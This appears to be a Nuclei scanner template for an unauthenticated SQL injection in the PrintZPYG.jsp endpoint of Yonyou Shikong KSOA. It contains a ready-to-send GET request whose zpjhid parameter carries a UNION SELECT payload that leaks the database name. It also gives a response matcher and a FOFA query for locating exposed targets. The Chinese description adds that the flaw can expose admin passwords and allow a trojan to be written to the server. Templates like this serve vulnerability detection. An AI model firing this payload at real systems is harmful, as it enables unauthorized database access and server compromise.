http:
    - matchers:
        - part: body
          type: word
          words:
            - master</font
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(1),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
id: yongyoushikong-KSOA-PrintZPYG-sql
info:
    author: Superhero
    description: |-
        fofa: app="用友-时空KSOA"
        用友时空KSOA系统 PrintZPYG.jsp接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 用友时空KSOA PrintZPYG.jsp接口存在SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247485471&idx=1&sn=49f1d6cc3dc41e44007519dd6974965d&chksm=c267bd2cf510343a4cc72df96f2f2a763d983184ee3b075e82a0f5340a5118082e0932aa640e&token=377357801&lang=zh_CN#rd
    severity: high
    tags:
        - Kong
